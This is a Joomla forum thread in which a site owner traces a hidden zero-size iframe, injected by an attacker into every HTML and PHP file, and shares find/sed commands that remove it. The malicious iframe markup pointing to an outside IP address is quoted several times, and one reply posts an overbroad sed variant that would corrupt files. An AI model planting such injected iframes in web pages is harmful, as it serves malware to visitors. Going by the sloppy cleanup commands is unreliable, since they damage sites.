How to remove iframes in all joomla files

nutts4life · **Joined:** Fri Apr 20, 2007 4:51 pm **Posts:** 22

Are these guys are so annoying.

So here's my site:
http://www.mymechanics.co.uk/

Before you click on it! There is a worm embedded in an iframe on the site.

It occurs in two places, here:

Code:

<body>
<div class="topbar">
<div id="navcontainer">
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><ul id="mainlevel-nav"><li><a href="http://www.mymechanics.co.uk/" class="mainlevel-nav" id="active_menu-nav">Home</a></li><li><a href="http://www.mymechanics.co.uk/Garages/" class="mainlevel-nav" >Browse Garages</a></li><li><a href="http://www.mymechanics.co.uk/Car-Advice/home" class="mainlevel-nav" >Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,14/" class="mainlevel-nav" >Add Garage</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,28/" class="mainlevel-nav" >Add Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/Forum/home" class="mainlevel-nav" >Forum</a></li></ul><div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>

Note that it occurs just before my first modules is loaded (which is mod_mainmenu). Here is the section in my template index.php:

Code:

<body>
<div class="topbar">
<div id="navcontainer">
<?php mosLoadModules ( 'top',-1 ); ?>
<div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>

I have a couple of other modules loading.

Then it occurs immediately in my content pane:

Code:

<div class="right_banner"></div>
   
      <table class="contentpaneopen">
            <tr>
         <td valign="top" colspan="2">
            <div align="left"><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>      <div class="moduletable-si">
            <table class="siteinfo">

The div -si is another module called mod_siteinfo. Here is it in my index.php:

Code:

<div class="right_banner"><?php mosLoadModules('banner',-1);?></div>
<?php mosMainBody(); ?>
<?php if (mosCountModules('user1') || mosCountModules('user2')) { ?>

I've checked both the modules and there is no sign of it in here.

Where on earth is this code being put!? Could it be in the mosloadmodule call? where is that?

Sorry, any help would be great.

Thanks,

Olly

nutts4life · **Joined:** Fri Apr 20, 2007 4:51 pm **Posts:** 22

Ok,

I've found out what these monkeys have done.

Everysingle one of the index.html's have got this code in them.

As you all know there's about 100 - 150 of these.

And i have 5 sites, that all have the same problem.

I need some ideas on how i'm going to get rid of these iframes.

Any ideas?

Thanks,

Olly

nutts4life · **Joined:** Fri Apr 20, 2007 4:51 pm **Posts:** 22

OK, here's how i did it. I hope this is useful for someone one day.

The hacker had search and replaced ALL the php / html and htm files in my hosting area.

The had added the iframe html above.

So i logged into my hosting server using putty and ran the following commands from the root directory:

Code:

find -name "*.htm*" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

AND

Code:

find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

This got rid of them.

Good luck and let's beat these guys.

n4l

Tonie · **Joined:** Thu Aug 18, 2005 7:13 am **Posts:** 13247

Have you also found the way they came into your site? If not, it's going to be child's play to do it again.

nutts4life · **Joined:** Fri Apr 20, 2007 4:51 pm **Posts:** 22

Toni,

Thanks for the concern, I did find the way. I was using an include one of my other sites and reading the parameters of the include from the URL!

How dumb was that. Anyway, i fixed it all. If it happens again.

I will contact here.

Thanks,

n4l

rajeshatbuzz · **Posted:** Mon Jun 22, 2009 7:42 pm

I just modify above script and used following...
find -name "*.htm*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.php*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.js*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.html*" -exec sed -i 's/<iframe src=//' {} \;

but no output..
Is the command line is correct?

mandville · **Posted:** Sun Oct 25, 2009 9:29 am

cagsan wrote:

And change the chmod of the files that infected from 777 to 666.

no - delete the infected files and replace with poper clean files and then make sure your site is secure

Joomla! Discussion Forums

Forum rules

How to remove iframes in all joomla files

Quick reply

Who is online